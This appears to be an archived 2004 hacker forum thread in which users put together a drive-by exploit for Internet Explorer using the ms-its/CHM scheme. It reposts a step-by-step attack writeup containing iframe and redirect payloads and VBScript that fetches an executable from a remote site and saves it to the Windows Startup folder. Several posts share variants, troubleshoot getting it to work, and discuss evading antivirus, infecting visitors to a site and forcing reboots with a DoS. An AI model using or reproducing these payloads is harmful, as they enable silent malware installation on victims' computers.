Full Version: Ie Everytime....
toska
Bizai.a

Original Exploit


xzibit
I tried playing with it, not sure how it works. Hehe, probably something easy I'm overlooking; any help would be appreciated.
realmasterX
Yes, it works fine ...
Very nice.

And I found an easy way to "kill" this bug!
You have to set "READ ONLY" on the dir c:\winnt\Downloaded Program Files
and the exploit doesn't work anymore.
aiboforcen
OK, thanks for the info. But I don't understand how this thing is working:
ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

What is this ss.MHT file? How can I create it, and should I put it in the same folder as the other files? And the .chm file... does it matter what .chm file I use as long as I name it chm.chm?
billkennedy32
These are better than any bind shell, since they can be spoofed as IE with PID using connectback, tunnel through any app firewall.
slb33
Don't really know how to use this but I'll check it out and give it a try

Thanks for the info
JDog45
Norton won't let you view the page because it contains a trojan, it says...
fyle
I played around with this one a bit too and I can't get it to do anything from
ms-its:mhtml:file://C:\someMht.mht!someUrl::/someTopic

I tried loading it from img src, iframe and meta refresh, and jimmied
around with each part, playing with "s and /s and //s and \s etc., but none were successful.

There is another older CHM exploit that uses showhelp() to download and run the chm to a
known location, and because when you make a CHM you can compile in a reference to a topic
in the help file pointing to an html page (with vbscript inside or whatever) and then use the
::/NameOfTopicInsideCHM.htm to run the vbscript in the html in the chm locally thereby
r3333t! haXx0ring with IE - this is a very serious vulnerability, obviously, because given the
ability to download from a site and then run the chm compromises the local zone, or my computer
zone, wtf ever.

But this ms-its:mhtml:file:C:\xxx.mht!url::/topic.htm I do not understand... Perhaps someone
who has had some luck with it would be so kind as to post the proper syntax, or if not that,
try to explain what's going on in the given exploit line?

That would be neat.
TedOb1
ya know JDog45 if it wasn't for av software ms would have us all using tin cans and string
xzibit
If anyone could give a little more input as to how this exploit works and how to get it working, it would be greatly appreciated.
what
QUOTE
(1.a) - Full path to CHM - ** OK **
    ms-its:http://www.helpware.net/htmlhelp/help.chm::/masterfile.htm
    BUT... This fails from inside a CHM file.

(1.b) - Full path to local CHM - ** OK **
    ms-its:c:\windows\help\windows.chm::/about_magnify.htm

(1.c) - Relative path to web CHM - ** Fails **.
    ms-its:help.chm::/masterfile.htm

Note: These links work -- However the entire CHM is being downloaded to your cache. First time will take forever. Second time will be quick as it loads from the cache.


found here. May help some people out there.
fyle
That link to the CHM syntax page refers to what works on Win98 with IE5.

I'm tellin' ya, it don't work.

Also, the link that toska provided to Bizai.a - the code given on that page (http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PHP_BIZAI.A&VSect=T) doesn't do a thing on a patched IE6 as
far as I can tell.

I played around with it also
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='mstasks.exe'>

from inside htmls in local zones, and then I compiled it into a CHM and tried running it in different ways from different locations, and IE6 will have nothing to do with that CLSID - it gives a warning and does nothing. I think the whole thing is bogus.

Gangster*
hmm.... interesting. I don't think i will be able to get it to work. Never have!

Thanks for the post
cherry
I worked on this one several weeks ago and decided it wasn't valid against ie6. Gave up over a week ago. Anyone gets it to work, please msg me for massive reward. Thanks.
what
It does work, locally. The cool thing is that the second time it loads the .chm file, it loads from the cache (AKA My Computer zone). Play with it some more, and it will work.

P.S., some more info about that "massive prize" would be nice also.
chris105
Is it just me or was this one discussed a while ago, a .wmz file or something ?
gogu258
Did you ever see it work?
captainil
works good :>
aLphaBeta
I got it to bypass KAV perfectly, but now I had to set up a NAV box to check where it is wrong, because NAV lit up, as reported by the victim site users..
toska
I hope someone is able to decrypt this, I found it running out there loose and stuff but
it seems interesting....


dragonfly
QUOTE (toska @ Feb 24 2004, 11:54 AM)
I hope someone is able to decrypt this, I found it running out there loose and stuff but
it seems interesting....



LOL iefucker.html

What in the world is this?
gogu258
Garbage....nothing else, IE can't display something like that because it isn't HTML code....
xzibit
QUOTE (gogu258 @ Feb 24 2004, 05:00 PM)
Garbage....nothing else, IE can't display something like that because it isn't HTML code....

I don't think that's true. Looks like encrypted vbscript/jscript.

Microsoft has released a program called "screnc.exe" that encrypts your jscript/vbscript. Good way to get past AV when using those IE exploits ;x
fyle
Thanks for the hint, what, you're absolutely correct. Figuring out how this works was like a fun little puzzle for me because I'm not a webmaster-type. This exploit method is nuts... the fact that it works on the most-used browser on earth is nuts.. there are definitely other ways of making this happen... luckily its not very obvious how to put the whole thing together.
gogu258
Anyway, that doesn't solve our problem; I didn't see any web page with ^^ exploit included (I mean CHM...lalala).
toska
Never mind.
extreme
I don't have time to check this one yet, but try downloading Help Workshop... You can create CHM files with it, as I recall from my previous exploits... Check it out and see..
what
For people that are still having trouble with this. . . . .

You want to download the .html file that has the exploit code as a .chm

To do this, you simply switch some parameters in the code (switch the .html to where the .chm file is) and then the .html code will be loaded from the local cache (which IE thinks is actually a .chm file), letting this exploit, and several others that are only local, now work remotely. It is similar to another exploit we've seen (data object?) in regards to what you are trying to do. It's a very good example of people creating exploits based on the research of others, which I believe is very helpful in regards to computer information and security.
BrandonTurner
I have been trying to get this to work forever. Here is the release on how it works, but it doesn't explain it well. Here is proof it works though.
http://www.michaelevanchik.com/security/mi.../chm/index.html
It puts an exe in your startup folder called 'real audio'. I can't figure it out though. Also, Norton does stop this exploit.
QUOTE

hi,

Thor Larholm reported a new unpatched and critical IE vuln which is exploited as an
infection vector for malicious codes and trojans (bid 9658)...

here are some details regarding this bug, from Berman Enconado of TrendMicro - (more
details will be released by Thor)

The exploit allows executable files to be downloaded and run in the background without
user intervention. It employs a malformed CLSID parameter, which enables it
to execute a file on the infected user's machine. When an infected user visits
a Web site, it can cause a possible malicious executable file to run on the system
without user permission.

The exploit works by tagging another script, which contains a CLASSID exploit as a
CHM. The following is an illustration of how this exploit works:

The file, LAUNCH.HTML, contains the following codes, which utilizes the exploit:

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

To execute the script (LAUNCH.HTML) as a CHM, another script tags and calls LAUNCH.HTML
using the following:

<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>


Solutions :
1)disable the execution of CHM files ? (Windows Explorer/Tools/Folder Options/File
Types/CHM ..)
2)rename registry entry ? HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
3)use another product ? :-/
4)wait for a patch ? (how long ?)


Cheers.
Isabelle - Security Engineer
K-OTik Security Staff
http://www.k-otik.com
extreme
OK, I think I will start playing with it, cause I am fully patched and it did work with me.. You can expect working POC in few days....
gogu258
It doesn't work for me. My Start-up is clean.
gogu258
It works!!
mastervampire
QUOTE (gogu258 @ Feb 25 2004, 10:42 PM)
It works!!

how?
gogu258
I don't know, I can't reproduce it. But the demo link works.
BrandonTurner
QUOTE (gogu258 @ Feb 26 2004, 12:10 AM)
I don't know, I can't reproduce it. But the demo link works.

i know this is a tricky one.
BrandonTurner
The owner of the site that the demo is on goes by the name 'mcbain' on AIM. I talked to him and he said he was going to explain how to do it and put it on his web site, but he didn't. I asked him and he said he was going to do it later that day and didn't. Then I asked if he could send me the files so I could figure it out, but he didn't respond. So I just gave up trying to talk to him; maybe someone else will have better luck.
sagitarioxp
Microsoft Internet Explorer ms-its scheme/CHM remote code execution

Feb 23, 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise
- Microsoft Windows 2000 Professional


not tested if vulnerable
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x


Not Vulnerable
--------------



Severity
---------
Critical - Remote code execution


In English
----------
There is yet another horrible exploit in internet explorer that allows html to be run
in My Computer zone allowing system access all via a hyperlink of a webserver. This
easily leads to remote code execution without any user intervention.



Tech Stuff and Explanation
--------------------------
1. Create an index.html file with the following source code.

<IFRAME SRC='re_direct2.asp'>
<IFRAME SRC='re_direct3.asp'>
<IFRAME SRC='re_direct4.asp'>
<IFRAME SRC='re_direct5.asp'>
<IFRAME SRC='re_direct.asp'>

you might think this is redundant but the exploit does not work unless you have a couple iframes
before the actual 're_direct.asp' page that runs the exploit.



2. re_direct2-5.asp contain exactly the following

<IMG SRC='ms-its:mhtml:file://C:\bla.MHT!http://yoursite//chm.chm::/runit.html'>

even though this does not work and shows up as an invalid image, this helps the final
re_direct.asp work. If not used the final iframe does not work for some reason.



3. re_direct.asp contains the following

<% response.redirect("URL:ms-its:mhtml:file://C:\bla.MHT!http://yoursite//chm.chm::/runit.html") %>

can you count the schemes in that url i see 5!!!


4. create a chm file that imports a file runit.html. You can create chm files with HTML workshop
downloadable at microsoft.com


5. runit.html includes the following code which i found to be undetected at the moment by avp's

<script language=vbs>
set oHTTP = CreateObject("msxml2.XMLHTTP")
oHTTP.open "GET", "http://yoursite/safe.exe", False
oHTTP.send
set oStream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
oStream.type = adTypeBinary
oStream.open
oStream.write oHTTP.responseBody
oStream.savetofile "c:\Documents and Settings\All Users\Start Menu\Programs\Startup\Real Audio.exe", adSaveCreateOverWrite
</script>



Other things
-----------
- This obviously will only work until the person reboots their computer. You can add your own DoS to force
them to reboot. ASN.1 DoS seems to be a recent working DoS that you can use since you get the person's
ip anyway from them visiting your webpage.

- I'm not quite sure step 5 works if the computer does NOT have MDAC or Microsoft Data Access installed.
Most computers have it but there might be a few that don't?

- ms-its: is just another god forsaken scheme or protocol microsoft supports. There are probably lots of
others undiscovered





Proof of Concept?
----------------
- http://www.michaelevanchik.com/security/mi.../chm/index.html

- look in your start up menu for real audio.exe in the path above in step 5



Vendor Recommendations
---------------------
- Microsoft probably knows all its schemes and protocols more than the security researcher.
It sure would be nice if they looked at them all and found others that could lead to
the "My Computer" zone

- As always Microsoft should pay BETTER people to test their software instead of rewards for
virus writers

- Microsoft should not deny local zone vulnerabilities as "not a vulnerability itself" problems
since if combined with other "not a vulnerability itself" bugs they lead to THE PROBLEM



Temp Fix
-------------
- Lock the my computer zone as untrusted. Guess you cant even trust yourself?
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)


Credit
------
Thor from pivx.com for finding the god forsaken protocol ms-its:
Http equiv and jelmer for the mshtml: discovery, local html execution code and example advisories.
Liu Die Yu because of his nice webpage of bugs at http://umbrella.mx.tc/


Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan


Contact
-------
Mike@MichaelEvanchik.com
http://www.MichaelEvanchik.com - me

http://Software.High-Pow-er.com - Need a professional programmer?
http://www.High-Pow-er.com - Other, Security, Consulting



BrandonTurner
QUOTE (sagitarioxp @ Mar 5 2004, 12:40 AM)
Microsoft Internet Explorer ms-its scheme/CHM remote code execution

Ladies and gentlemen, we have a winner.
extreme
Yep, but I haven't managed to replicate this one.. I only tried with his compiled CHM file.. Maybe that is why it didn't work.. Just get a non-compiled CHM to me and I will finish the rest and post here..
Also, if it is possible to "write" on the local system, then you can better use that notepad overwriting exploit.. Works only on XP as far as I know, but it is a sure hit..
fyle
I have gotten it to work on 95/98/ME/NT/XP/2000.

And you don't have to use asp, just any old server thingy that you feel like piecing together that will send a '302 Object moved' http header with the Location pointing to the ms-its again so that it reloads from its local cache. Works best if you give it a 3-5 second wait before you send 302 for dial-ups.

This sploit is really nasty. MS should issue a fix asap.
BrandonTurner
OK... what do you put in the chm file that makes it 'import' the runit.html file?
fyle
First make the HTML that you want to run locally on the target computer, put in all the vbs/js and crap, then if you're using HTML Help Workshop start a new project and under the Contents tab hit Insert Topic | Add and just plop in the html. Then the name of the HTML that you call from ms-its:mhtml is at the end of the string ::/thisHtml.html

An example html file that I was using for tests (running from the chm)

<script language=vbs>
on error resume next
set oHTTP = CreateObject("msxml2.XMLHTTP")
oHTTP.open "GET", "http://www.yourwebsite.com/whatever/compromised.vbs", False
oHTTP.send
set oStream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
oStream.type = adTypeBinary
oStream.open
oStream.write oHTTP.responseBody
oStream.savetofile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\compromised.vbs", adSaveCreateOverWrite
oStream.savetofile "C:\WINDOWS\All Users\Start Menu\Programs\StartUp\compromised.vbs", adSaveCreateOverWrite
oStream.savetofile "D:\Documents and Settings\All Users\Start Menu\Programs\Startup\compromised.vbs", adSaveCreateOverWrite
oStream.savetofile "D:\WINDOWS\All Users\Start Menu\Programs\StartUp\compromised.vbs", adSaveCreateOverWrite
</script>

Toss that into notepad and give it an html extension. The chm downloads the compromised.vbs to the startup folder, and it is run on the next restart or login as if the user had double-clicked it himself.

extreme
Can you upload non compiled CHM file please? My HTML workshop just eats shit and I can't create new one with the way you said..
XFT
I can't make it work :( A damn message about opening or saving re_direct.asp is popping up, but when I visit this url http://www.michaelevanchik.com/security/mi.../chm/index.html
all is ok.
Please help me.
gogu258
You should compile your own chm file.
XFT
QUOTE (gogu258 @ Mar 6 2004, 07:00 PM)
You should compile your own chm file.

heh, funny enough :)
I certainly did, but that message still appears....grrr..
so, step by step:
1. I create index.html file containing:
<IFRAME SRC='re_direct2.asp'>
<IFRAME SRC='re_direct3.asp'>
<IFRAME SRC='re_direct4.asp'>
<IFRAME SRC='re_direct5.asp'>
<IFRAME SRC='re_direct.asp'>
2. creating re_direct2.asp..re_direct5.asp containing:
<IMG SRC='ms-its:mhtml:file://C:\bla.MHT!http://www.mysitehere.com/test//chm.chm::/runit.html'>
3. creating re_direct.asp containing
<% response.redirect("URL:ms-its:mhtml:file://C:\bla.MHT!http://www.mysitehere.com/test//chm.chm::/runit.html") %>
4. creating runit.html containing
<script language=vbs>
set oHTTP = CreateObject("msxml2.XMLHTTP")
oHTTP.open "GET", "http://www.mysitehere.com/test/safe.exe", False
oHTTP.send
set oStream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
oStream.type = adTypeBinary
oStream.open
oStream.write oHTTP.responseBody
oStream.savetofile "c:\test.exe", adSaveCreateOverWrite
</script>
5. running html help workshop:
File->New->Project->Contents->Insert Topic
Add->File or Url: runit.html
Entry title - runit.html
file->compile
renaming chm file to chm.chm
6. uploading all files to http://www.mysitehere.com/test/
opening http://www.mysitehere.com/test/index.html with ie
Please tell me where I made a mistake.
Thanks
fyle
I've been trying to find a way to make the downloaded file from the vbs run from the embedded html without doing something like overwriting notepad and then forcing the browser to view-source, or else dropping the vbs to Startup so that it runs on restart. I've tried numerous things but haven't found anything that works consistently yet. With the notepad method, it only works if notepad is closed when the target browser loads the infected site, and even then it doesn't work on all Win versions. Any scripting gurus know a way? Maybe a trick with xml/ado?
extreme
@fyle
Yes, there is a way, just check other exploits, or reply on MY PM sent to YOU and I will send you solution... Nobody else should be sending me PMs..
BrandonTurner
QUOTE (extreme @ Mar 7 2004, 04:30 AM)
@fyle
Yes, there is a way, just check other exploits, or reply on MY PM sent to YOU and I will send you solution... Nobody else should be sending me PMs..

too cool to have people send you PMs?
extreme
You wanna say I am not too cool???
It is just that people understood that I said "PM me if you want this exploit", and I didn't mean that. So why waste their and my time just to PM me, when I don't have anything to offer regarding this issue.. There, I justified myself...
Anyway people.. Don't forget, I am 2cool4you...
Invision Power Board © 2001-2005 Invision Power Services, Inc.